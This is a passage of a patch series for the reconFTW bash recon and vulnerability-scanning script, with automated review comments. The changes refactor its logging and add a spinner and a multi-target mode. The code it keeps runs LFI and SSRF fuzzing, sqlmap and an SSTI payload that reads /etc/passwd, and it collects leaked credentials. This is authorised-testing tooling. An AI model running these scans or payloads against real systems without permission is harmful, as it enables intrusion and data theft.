+ end_func "Results are saved in webs/cors.txt"
 else
 if [ "$CORS" = false ]; then
 printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
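Review bot: `end_func "Results are saved in webs/cors.txt"` omits the `${FUNCNAME[0]}` argument, so `end_func`'s `touch $called_fn_dir/.${2}` targets the directory itself and the completion notification reads ` Finished in …`; the `.cors` marker is only created because the `&& touch` on the `eval cat webs/cors.txt` line survived, which ties the marker to `cat` succeeding rather than to corsy. Pass the name as the other functions do: `end_func "Results are saved in webs/cors.txt" ${FUNCNAME[0]}`, and then drop the redundant `&& touch`.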
@@ -1111,40 +930,24 @@ function cors(){ function open_redirect(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$OPEN_REDIRECT" = true ] then + start_func "Open redirects checks" if [ "$DEEP" = true ] ; then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Open redirects checks ${reset}\n" - start=`date +%s` cat gf/redirect.txt | qsreplace FUZZ | anew -q .tmp/tmp_redirect.txt eval python3 $tools/OpenRedireX/openredirex.py -l .tmp/tmp_redirect.txt --keyword FUZZ -p $tools/OpenRedireX/payloads.txt $DEBUG_ERROR | grep "^http" > vulns/redirect.txt sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" vulns/redirect.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Open Redirects Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in vulns/openredirex.txt ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in vulns/openredirex.txt" ${FUNCNAME[0]} else if [[ $(cat gf/redirect.txt | wc -l) -le 1000 ]] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Open redirects checks ${reset}\n" - start=`date +%s` cat gf/redirect.txt | qsreplace FUZZ | anew -q .tmp/tmp_redirect.txt eval python3 $tools/OpenRedireX/openredirex.py -l .tmp/tmp_redirect.txt --keyword FUZZ -p $tools/OpenRedireX/payloads.txt $DEBUG_ERROR | grep "^http" > vulns/redirect.txt sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" vulns/redirect.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Open Redirects Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in vulns/redirect.txt ${reset}\n" + end_func "Results are saved in 
vulns/openredirex.txt" ${FUNCNAME[0]} else printf "${bred} Skipping Open redirects: Too Much URLs to test, try with --deep flag${reset}\n" + printf "${bgreen}#######################################################################\n" fi fi - printf "${bgreen}#######################################################################\n" else if [ "$OPEN_REDIRECT" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1157,11 +960,9 @@ function open_redirect(){ function ssrf_checks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SSRF_CHECKS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} SSRF checks ${reset}\n" if [ -n "$COLLAB_SERVER" ]; then + start_func "SSRF checks" if [ "$DEEP" = true ] ; then - start=`date +%s` cat gf/ssrf.txt | qsreplace FUZZ | anew -q .tmp/tmp_ssrf.txt COLLAB_SERVER_FIX=$(echo $COLLAB_SERVER | sed -r "s/https?:\/\///") echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt 
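Review bot: In `open_redirect`, `start_func "Open redirects checks"` now runs before the DEEP/size checks, so when `gf/redirect.txt` exceeds 1000 lines the function prints "Skipping Open redirects", never reaches `end_func`, and the spinner started by `start_func` is left running because nothing calls `stop_spinner` on that path. Both `end_func` calls also say `Results are saved in vulns/openredirex.txt` while both branches write `> vulns/redirect.txt`; the old non-deep message named the right file. Either move `start_func` below the size check or add `stop_spinner` to the skip branch, and use `end_func "Results are saved in vulns/redirect.txt" ${FUNCNAME[0]}` in both places. The hunk begins on the previous visible line.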
@@ -1169,19 +970,11 @@ function ssrf_checks(){ for url in $(cat .tmp/tmp_ssrf.txt); do ffuf -v -H "${HEADER}" -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt done - eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt - - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n SSRF Finished in ${runtime}, check your callback server\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in ssrf_confirmed.txt ${reset}\n" + end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} else if [[ $(cat gf/ssrf.txt | wc -l) -le 1000 ]] then - start=`date +%s` cat gf/ssrf.txt | qsreplace FUZZ | anew -q .tmp/tmp_ssrf.txt COLLAB_SERVER_FIX=$(echo $COLLAB_SERVER | sed -r "s/https?:\/\///") echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt 
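Review bot: The deep branch drops `eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt`, while the non-deep branch in the next hunk still runs it, so `--deep` now performs fewer SSRF checks than the default mode; if that is unintended, restore the line before `end_func`. The old completion text told the operator to "check your callback server", which matters here because blind SSRF hits only appear on `$COLLAB_SERVER`, not in `vulns/ssrf.txt`; consider `end_func "Results are saved in vulns/ssrf.txt, check your callback server" ${FUNCNAME[0]}`. In the kept loop, `ffuf … -u $url &>/dev/null | grep "URL"` sends ffuf's stdout to /dev/null before the pipe, so grep reads nothing and the loop can never write a result; `2>/dev/null` is what was meant.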
@@ -1190,20 +983,15 @@ function ssrf_checks(){ ffuf -v -H "${HEADER}" -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt done eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n SSRF Finished in ${runtime}, check your callback server\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in vulns/ssrf.txt ${reset}\n" + end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} else printf "${bred} Skipping SSRF: Too Much URLs to test, try with --deep flag${reset}\n" fi fi else printf "${bred}\n No COLLAB_SERVER defined\n" + printf "${bgreen}#######################################################################\n" fi - printf "${bgreen}#######################################################################\n" else if [ "$SSRF_CHECKS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
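Review bot: The "Skipping SSRF: Too Much URLs" branch never stops the spinner that `start_func` (moved inside the `COLLAB_SERVER` check in the previous hunk) started, because `stop_spinner` is only invoked from `end_func`; add `stop_spinner` to that `else`, and restore the closing `printf "${bgreen}####…"` there too, since it was moved into the no-`COLLAB_SERVER` branch only. The `end_func` above also marks `ssrf_checks` done regardless of whether `ssrf.py` or the ffuf loop succeeded, which the old `touch` placement at least ordered after them.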
@@ -1216,16 +1004,9 @@ function ssrf_checks(){
 function crlf_checks(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CRLF_CHECKS" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} CRLF checks ${reset}\n"
- start=`date +%s`
- eval crlfuzz -l webs/webs.txt -o vulns/crlf.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]}
- end=`date +%s`
- getElapsedTime $start $end
- text="${bblue}\n CRLF Finished in ${runtime}${reset}\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- printf "${bblue} Results are saved in crlf.txt ${reset}\n"
- printf "${bgreen}#######################################################################\n"
+ start_func "CRLF checks"
+ eval crlfuzz -l webs/webs.txt -o vulns/crlf.txt $DEBUG_STD
+ end_func "Results are saved in vulns/crlf.txt" ${FUNCNAME[0]}
 else
 if [ "$CRLF_CHECKS" = false ]; then
 printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
@@ -1238,20 +1019,12 @@ function crlf_checks(){
 function lfi(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$LFI" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} LFI checks ${reset}\n"
- start=`date +%s`
+ start_func "LFI checks"
 cat gf/lfi.txt | qsreplace FUZZ | anew -q .tmp/tmp_lfi.txt
 for url in $(cat .tmp/tmp_lfi.txt); do
 ffuf -v -mc 200 -H "${HEADER}" -w $lfi_wordlist -u $url -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/lfi.txt
 done
- touch $called_fn_dir/.${FUNCNAME[0]}
- end=`date +%s`
- getElapsedTime $start $end
- text="${bblue}\n LFI Finished in ${runtime}${reset}\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- printf "${bblue} Results are saved in lfi.txt ${reset}\n"
- printf "${bgreen}#######################################################################\n"
+ end_func "Results are saved in vulns/lfi.txt" ${FUNCNAME[0]}
 else
 if [ "$LFI" = false ]; then
 printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
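Review bot: `ffuf … -mr "root:" &>/dev/null | grep "URL"` redirects ffuf's stdout and stderr to /dev/null before the pipe, so `grep` reads an empty stream and `vulns/lfi.txt` can never receive a hit; the commit keeps this line as context and then has `end_func` mark `lfi` done with an always-empty result. Silence stderr only: `ffuf -v -mc 200 -H "${HEADER}" -w $lfi_wordlist -u $url -mr "root:" 2>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/lfi.txt`. The `for url in $(cat …)` loop also leaves `$url` unquoted, so a URL containing glob characters is subject to pathname expansion before it reaches ffuf.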
@@ -1264,23 +1037,12 @@ function lfi(){ function ssti(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SSTI" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} SSTI checks ${reset}\n" - start=`date +%s` - + start_func "SSTI checks" cat gf/ssti.txt | qsreplace "ssti{{7*7}}" | anew -q .tmp/ssti_fuzz.txt ffuf -v -mc 200 -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "ssti49" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt - cat gf/ssti.txt | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | anew -q .tmp/ssti_fuzz2.txt ffuf -v -mc 200 -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt - - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n SSTI Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in ssti.txt ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in vulns/ssti.txt" ${FUNCNAME[0]} else if [ "$SSTI" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
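Review bot: The second payload list is written to `.tmp/ssti_fuzz2.txt`, but the following ffuf line still reads `-w .tmp/ssti_fuzz.txt -u FUZZ -mr "root:"`, so the `/etc/passwd` read check re-sends the `{{7*7}}` payloads and can only match `root:` by accident; change it to `-w .tmp/ssti_fuzz2.txt`. Both ffuf lines also use `&>/dev/null | grep "URL"`, which sends ffuf's stdout to /dev/null before grep sees it, so `vulns/ssti.txt` stays empty regardless of the wordlist; use `2>/dev/null` instead. Since the `subclasses()[40]('/etc/passwd').read()` payload is a live file-read attempt rather than a detection probe, a comment stating that this branch actively exploits confirmed targets would help an operator decide whether to keep `SSTI=true` for a given scope.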
@@ -1293,18 +1055,10 @@ function ssti(){
 function sqli(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SQLI" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} SQLi checks ${reset}\n"
- start=`date +%s`
+ start_func "SQLi checks"
 cat gf/sqli.txt | qsreplace FUZZ | anew -q .tmp/tmp_sqli.txt
 interlace -tL .tmp/tmp_sqli.txt -threads 10 -c "python3 $tools/sqlmap/sqlmap.py -u _target_ -b --batch --disable-coloring --random-agent --output-dir=sqlmap" &>/dev/null
- touch $called_fn_dir/.${FUNCNAME[0]}
- end=`date +%s`
- getElapsedTime $start $end
- text="${bblue}\n SQLi Finished in ${runtime}${reset}\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- printf "${bblue} Results are saved in sqlmap folder ${reset}\n"
- printf "${bgreen}#######################################################################\n"
+ end_func "Results are saved in sqlmap folder" ${FUNCNAME[0]}
 else
 if [ "$SQLI" = false ]; then
 printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
@@ -1317,16 +1071,9 @@ function sqli(){
 function test_ssl(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$TEST_SSL" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} SSL Test ${reset}\n"
- start=`date +%s`
+ start_func "SSL Test"
 eval $tools/testssl.sh/testssl.sh --quiet --color 0 -U -iL hosts/ips.txt $DEBUG_ERROR > hosts/testssl.txt && touch $called_fn_dir/.${FUNCNAME[0]}
- end=`date +%s`
- getElapsedTime $start $end
- text="${bblue}\n SSL Test Finished in ${runtime}\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- printf "${bblue} Results are saved in hosts/testssl.txt ${reset}\n"
- printf "${bgreen}#######################################################################\n"
+ end_func "Results are saved in hosts/testssl.txt" ${FUNCNAME[0]}
 else
 if [ "$TEST_SSL" = false ]; then
 printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
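Review bot: The `&& touch $called_fn_dir/.${FUNCNAME[0]}` left on the testssl line is now redundant with `end_func`, which touches the same marker unconditionally, so testssl's exit status no longer gates anything; either drop the trailing `&& touch …` for consistency with the other converted functions, or keep the marker tied to success and call `end_func` only when testssl returned 0. Because `$DEBUG_ERROR` discards stderr, a missing `hosts/ips.txt` produces an empty `hosts/testssl.txt` that is still recorded as a completed scan.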
@@ -1384,6 +1131,123 @@ function output(){ mv $dir $dir_output } +function notification(){ + if [ ! -z "$1" ] && [ ! -z "$2" ] + then + case $2 in + info) + text="\n${bblue} ${1} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + ;; + warn) + text="\n${yellow} ${1} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + ;; + error) + text="\n${bred} ${1} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + ;; + good) + text="\n${bgreen} ${1} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + ;; + esac + fi +} + +function start_func(){ + printf "${bgreen}#######################################################################\n" + notification "${1}" info + start=`date +%s` + start_spinner +} + +function end_func(){ + touch $called_fn_dir/.${2} + end=`date +%s` + getElapsedTime $start $end + stop_spinner + notification "${2} Finished in ${runtime}" info + printf "${bblue} ${1} ${reset}\n" + printf "${bgreen}#######################################################################\n" +} + +function start_subfunc(){ + notification "${1}" warn + start_sub=`date +%s` + start_spinner +} + +function end_subfunc(){ + touch $called_fn_dir/.${2} + end_sub=`date +%s` + getElapsedTime $start_sub $end_sub + stop_spinner + notification "${1} in ${runtime}" good +} + +function _spinner() { + # $1 start/stop + # + # on start: $2 display message + # on stop : $2 process exit status + # $3 spinner function pid (supplied from stop_spinner) + + local on_success="DONE" + local on_fail="FAIL" + local white="\e[1;37m" + local green="\e[1;32m" + local red="\e[1;31m" + local nc="\e[0m" + + case $1 in + start) + + let column=$(tput cols)-${#2}+2 + echo -ne ${2} + + printf "%${column}s" + # start spinner + i=1 + sp='⣾⣽⣻⢿⡿⣟⣯⣷' + charwidth=3 + delay=${SPINNER_DELAY:-0.15} + + while : + do + printf "\b${sp:i++%${#sp}:1}" + sleep $delay + done + ;; + stop) + if [[ -z ${1} ]]; then + echo "spinner is not running.." 
+ exit 1 + fi + kill -9 $1 > /dev/null 2>&1 + ;; + *) + echo "invalid argument, try {start/stop}" + exit 1 + ;; + esac +} + +function start_spinner { + # $1 : msg to display + _spinner "start" & + # set global spinner pid + _sp_pid=$! + disown +} + +function stop_spinner { + # $1 : command exit status + _spinner "stop" $_sp_pid + unset _sp_pid +} + + function start(){ global_start=`date +%s` @@ -1405,7 +1269,7 @@ function start(){ then domain="Multi" dir=$SCRIPTPATH/Recon/$domain - called_fn_dir=$dir/.called + called_fn_dir=$dir/.called_fn fi if [[ "$list" = /* ]]; then install -D $list $dir/webs/webs.txt @@ -1491,10 +1355,10 @@ function end(){ function passive(){ start domain_info + emails google_dorks github_dorks metadata - emails SUBSCRAPING=false WEBPROBESIMPLE=false subdomains_full @@ -1507,10 +1371,10 @@ function passive(){ function all(){ start domain_info + emails google_dorks github_dorks metadata - emails subdomains_full subtakeover webprobe_full @@ -1526,13 +1390,13 @@ function all(){ urlchecks wordlist_gen url_gf + jschecks open_redirect ssrf_checks crlf_checks lfi ssti sqli - jschecks xss brokenLinks test_ssl @@ -1542,10 +1406,10 @@ function all(){ function recon(){ start domain_info + emails google_dorks github_dorks metadata - emails subdomains_full subtakeover webprobe_full 
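Review bot: In `_spinner`'s `stop)` branch both `[[ -z ${1} ]]` and `kill -9 $1` operate on `$1`, which is the literal string `stop`, so the "spinner is not running" guard can never fire and `kill -9 stop` fails silently under `> /dev/null 2>&1`, leaving the disowned spinner loop running after every `end_func`; the pid that `stop_spinner` passes arrives as `$2` and should be tested and killed there, preferably with plain `kill` before `-9`. `notification` interpolates its message into the `printf` format string (`printf "${text}"`), so a message containing `%` is parsed as a directive; the counts passed today are harmless, but anything derived from scan output would not be, so prefer `printf '%b' "${text}"`. `start_spinner` also ignores its documented `$1` and runs `_spinner "start" &` with no message, so `echo -ne ${2}` prints nothing and `let column=$(tput cols)-${#2}+2` is computed against an empty string. This hunk starts on the previous visible line; the remaining hunks here (`start`, `passive`, `all`, `recon`) only reorder calls.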
@@ -1564,6 +1428,72 @@ function recon(){ end } +function multi_recon(){ + if [ -s "$list" ] + then + targets=$(cat $list) + else + notification "Target list not provided" error + exit + fi + workdir=$SCRIPTPATH/Recon/$multi + mkdir -p $workdir && cd $workdir + mkdir -p .tmp .called_fn_dir osint subdomains webs hosts vulns + for domain in $targets; do + dir=$workdir/targets/$domain + mkdir -p $dir + cd $dir + mkdir -p .tmp .called_fn_dir osint subdomains webs hosts vulns + domain_info + emails + google_dorks + github_dorks + metadata + subdomains_full + subtakeover + webprobe_full + screenshot + favicon + done + cd $workdir + + notification "############################# Total data ############################" info + NUMOFLINES_users_total=$(find . -type f -name 'users.txt' -exec cat {} + | anew -q osint/users.txt | wc -l) + NUMOFLINES_pwndb_total=$(find . -type f -name 'passwords.txt' -exec cat {} + | anew -q osint/passwords.txt | wc -l) + NUMOFLINES_software_total=$(find . -type f -name 'software.txt' -exec cat {} + | anew -q osint/software.txt | wc -l) + NUMOFLINES_authors_total=$(find . -type f -name 'authors.txt' -exec cat {} + | anew -q osint/authors.txt | wc -l) + NUMOFLINES_subs_total=$(find . -type f -name 'subdomains.txt' -exec cat {} + | anew -q subdomains/subdomains.txt | wc -l) + NUMOFLINES_subtko_total=$(find . -type f -name 'takeover.txt' -exec cat {} + | anew -q webs/takeover.txt | wc -l) + NUMOFLINES_webs_total=$(find . -type f -name 'webs.txt' -exec cat {} + | anew -q webs/webs.txt | wc -l) + NUMOFLINES_webs_total=$(find . 
-type f -name 'webs_uncommon_ports.txt' -exec cat {} + | anew -q webs/webs_uncommon_ports.txt | wc -l) + + notification "- ${NUMOFLINES_users_total} total users found" good + notification "- ${NUMOFLINES_pwndb_total} total creds leaked" good + notification "- ${NUMOFLINES_software_total} total software found" good + notification "- ${NUMOFLINES_authors_total} total authors found" good + notification "- ${NUMOFLINES_subs_total} total subdomains" good + notification "- ${NUMOFLINES_subtko_total} total probably subdomain takeovers" good + notification "- ${NUMOFLINES_webs_total} total websites" good + + portscan + waf_checks + nuclei_check + for domain in $targets; do + dir=$workdir/targets/$domain + cd $dir + cms_scanner + fuzz + params + urlchecks + wordlist_gen + url_gf + jschecks + done + cd $workdir + dir=$workdir + end +} + function subs_menu(){ start subdomains_full @@ -1615,12 +1545,12 @@ banner if [ -z "$1" ] then - help - tools_installed - exit + help + tools_installed + exit fi -while getopts ":hd:-:l:x:varspxwo:" opt; do +while getopts ":hd:-:l:m:x:varspxwo:" opt; do general=$@ if [[ $general == *"-v"* ]]; then unset DEBUG_STD @@ -1633,6 +1563,11 @@ while getopts ":hd:-:l:x:varspxwo:" opt; do FULLSCOPE=true fi case ${opt} in + + ## TARGETS + + m ) multi=$OPTARG + ;; d ) domain=$OPTARG ;; l ) list=$OPTARG @@ -1645,7 +1580,15 @@ while getopts ":hd:-:l:x:varspxwo:" opt; do exit fi ;; - r ) if [ -n "$list" ] + + ## MODES + + r ) if [ ! -z "$multi" ] + then + multi_recon + exit + fi + if [ -n "$list" ] then for domain in $(cat $list); do recon From 0e0182796f36f23bedc0f8e563eaef0aa4b08282 Mon Sep 17 00:00:00 2001 From: six2dez Date: Fri, 12 Mar 2021 14:54:42 +0100 Subject: [PATCH 2/3] Colour spinner --- install.sh | 6 +++--- reconftw.sh | 28 ++++------------------------ 2 files changed, 7 insertions(+), 27 deletions(-) diff --git a/install.sh b/install.sh index ce15a584..441adc3f 100755 --- a/install.sh +++ b/install.sh 
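Review bot: Every total in the "Total data" block of `multi_recon` pipes into `anew -q … | wc -l`, and `-q` suppresses anew's stdout, so all seven `NUMOFLINES_*_total` values are always 0; drop `-q` here, as the counting pipelines earlier in this patch do (`anew webs/url_extract.txt | wc -l`). `NUMOFLINES_webs_total` is also assigned twice, so "total websites" reports the `webs_uncommon_ports.txt` count. `multi_recon` creates `.called_fn_dir` directories but never assigns `called_fn_dir` and does not call `start`, which is where the `called_fn_dir=$dir/.called_fn` assignment in this patch lives, so unless it is set somewhere not visible here the `[ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ]` checks and `end_func`'s `touch` resolve against `/`. Each `cd $dir` and `cd $workdir` is unchecked, so a failed `cd` runs the per-target steps in the previous target's directory; use `cd "$dir" || { notification "cannot cd to $dir" error; exit 1; }`, and note that `workdir=$SCRIPTPATH/Recon/$multi` takes `-m` verbatim, so a value containing `/` or `..` lands outside `Recon/`. The hunk begins on the previous visible line.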
@@ -28,16 +28,16 @@ printf "${bgreen} reconFTW installer script ${reset}\n\n" install_apt(){ eval $SUDO apt install chromium-browser -y $DEBUG_STD eval $SUDO apt install chromium -y $DEBUG_STD - eval $SUDO apt install python3 python3-pip ruby git curl libpcap-dev wget python-dev python3-dev dnsutils build-essential xvfb libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev nmap jq python3-shodan apt-transport-https lynx tor -y $DEBUG_STD + eval $SUDO apt install python3 python3-pip ruby git curl libpcap-dev wget python-dev python3-dev dnsutils build-essential xvfb libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev nmap jq python3-shodan apt-transport-https lynx tor lolcat -y $DEBUG_STD eval $SUDO systemctl enable tor $DEBUG_STD } install_yum(){ - eval $SUDO yum install python3 python3-pip ruby git curl libpcap-devel chromium wget openssl-devel bind-utils python3-devel lynx libxslt-devel libffi-devel xorg-x11-server-Xvfb libxml2-devel nmap zlib-devel jq python-shodan -y $DEBUG_STD + eval $SUDO yum install python3 python3-pip ruby git curl libpcap-devel chromium wget openssl-devel bind-utils python3-devel lynx libxslt-devel libffi-devel xorg-x11-server-Xvfb libxml2-devel nmap zlib-devel jq python-shodan lolcat -y $DEBUG_STD } install_pacman(){ - eval $SUDO pacman -Sy install python python-pip dnsutils ruby curl git libpcap nmap chromium wget jq xorg-server-xvfb tor lynx -y $DEBUG_STD + eval $SUDO pacman -Sy install python python-pip dnsutils ruby curl git libpcap nmap chromium wget jq xorg-server-xvfb tor lynx lolcat -y $DEBUG_STD eval $SUDO systemctl enable --now tor.service $DEBUG_STD } diff --git a/reconftw.sh b/reconftw.sh index 6edc7d58..e66246a5 100755 --- a/reconftw.sh +++ b/reconftw.sh 
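Review bot: The `install_pacman` line edited here still reads `pacman -Sy install python …`; pacman has no `install` verb, so as far as I know `install` is treated as a package name and the transaction fails with "target not found", meaning the whole Arch dependency list is never installed — drop that token and use `--noconfirm` instead of `-y` (which is `--refresh`, not auto-confirm). Adding `lolcat` to all three package managers for a cosmetic spinner is a questionable hard dependency: on yum/dnf systems it is a Ruby gem rather than a default-repo package, and with `$DEBUG_STD` discarding output a failed install of the combined package list goes unnoticed.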
@@ -1187,32 +1187,15 @@ function end_subfunc(){ } function _spinner() { - # $1 start/stop - # - # on start: $2 display message - # on stop : $2 process exit status - # $3 spinner function pid (supplied from stop_spinner) - - local on_success="DONE" - local on_fail="FAIL" - local white="\e[1;37m" - local green="\e[1;32m" - local red="\e[1;31m" - local nc="\e[0m" case $1 in start) - let column=$(tput cols)-${#2}+2 echo -ne ${2} - printf "%${column}s" - # start spinner i=1 sp='⣾⣽⣻⢿⡿⣟⣯⣷' - charwidth=3 delay=${SPINNER_DELAY:-0.15} - while : do printf "\b${sp:i++%${#sp}:1}" @@ -1224,7 +1207,8 @@ function _spinner() { echo "spinner is not running.." exit 1 fi - kill -9 $1 > /dev/null 2>&1 + kill $2 > /dev/null 2>&1 + echo -en "\b " ;; *) echo "invalid argument, try {start/stop}" @@ -1234,20 +1218,16 @@ function _spinner() { } function start_spinner { - # $1 : msg to display - _spinner "start" & - # set global spinner pid + _spinner "start" "${1}" | lolcat & _sp_pid=$! disown } function stop_spinner { - # $1 : command exit status - _spinner "stop" $_sp_pid + _spinner "stop" $1 $_sp_pid unset _sp_pid } - function start(){ global_start=`date +%s` From 6867f37667c11e9633a648d2db0d91e59fe4336e Mon Sep 17 00:00:00 2001 From: six2dez Date: Sat, 13 Mar 2021 02:55:10 +0100 Subject: [PATCH 3/3] Fixes and threads control --- install.sh | 6 +- reconftw.cfg | 13 ++- reconftw.sh | 228 +++++++++++++++++---------------------------------- 3 files changed, 87 insertions(+), 160 deletions(-) diff --git a/install.sh b/install.sh index 441adc3f..ce15a584 100755 --- a/install.sh +++ b/install.sh 
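Review bot: `echo -ne ${2}` on the `start` path prints the message unquoted, so runs of spaces are collapsed and any backslash sequence in the caller's text is interpreted, even though the new `start_spinner` goes to the trouble of passing `"${1}"` quoted. `printf '%s' "$2"` preserves the text as given and is the portable choice. The spinner loop continues outside the hunk.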
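Review bot: `kill $2` signals the wrong process: with the new `stop_spinner` (hunk `@@ -1234`) calling `_spinner "stop" $1 $_sp_pid`, the spinner pid arrives as `$3` and `$2` is whatever exit status the caller passed (the removed comment documented `$1 : command exit status`). If that status is `0`, `kill 0` sends SIGTERM to the whole process group, i.e. the script itself; the line only works when `stop_spinner` is called with no argument, because the empty unquoted `$1` then collapses and the pid shifts into `$2`. Use `kill "$3" > /dev/null 2>&1` here and pass the status explicitly in `stop_spinner`, `_spinner "stop" "${1:-0}" "$_sp_pid"`. The `if` guard preceding `echo "spinner is not running.."` is outside the hunk, so it is unclear whether it checks `$2` or `$3` — align it with whichever is chosen.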
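Review bot: After `_spinner "start" "${1}" | lolcat &`, `$!` is the pid of the last pipeline element, `lolcat`, not of the `_spinner` loop, so the later `kill` stops only the colouriser; the loop presumably dies from SIGPIPE on its next `printf`, which is incidental rather than designed. The pipe also makes `lolcat` a hard runtime dependency: if it is missing the message is never displayed and `$!` refers to a process that already failed. A fallback near the top of the script, `command -v lolcat >/dev/null 2>&1 || lolcat() { cat; }`, keeps the spinner usable without it; if the pipeline stays, record the spinner's own pid (for example have the loop write `$BASHPID` to a variable or file) instead of relying on `$!`.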
@@ -28,16 +28,16 @@ printf "${bgreen} reconFTW installer script ${reset}\n\n" install_apt(){ eval $SUDO apt install chromium-browser -y $DEBUG_STD eval $SUDO apt install chromium -y $DEBUG_STD - eval $SUDO apt install python3 python3-pip ruby git curl libpcap-dev wget python-dev python3-dev dnsutils build-essential xvfb libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev nmap jq python3-shodan apt-transport-https lynx tor lolcat -y $DEBUG_STD + eval $SUDO apt install python3 python3-pip ruby git curl libpcap-dev wget python-dev python3-dev dnsutils build-essential xvfb libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev nmap jq python3-shodan apt-transport-https lynx tor -y $DEBUG_STD eval $SUDO systemctl enable tor $DEBUG_STD } install_yum(){ - eval $SUDO yum install python3 python3-pip ruby git curl libpcap-devel chromium wget openssl-devel bind-utils python3-devel lynx libxslt-devel libffi-devel xorg-x11-server-Xvfb libxml2-devel nmap zlib-devel jq python-shodan lolcat -y $DEBUG_STD + eval $SUDO yum install python3 python3-pip ruby git curl libpcap-devel chromium wget openssl-devel bind-utils python3-devel lynx libxslt-devel libffi-devel xorg-x11-server-Xvfb libxml2-devel nmap zlib-devel jq python-shodan -y $DEBUG_STD } install_pacman(){ - eval $SUDO pacman -Sy install python python-pip dnsutils ruby curl git libpcap nmap chromium wget jq 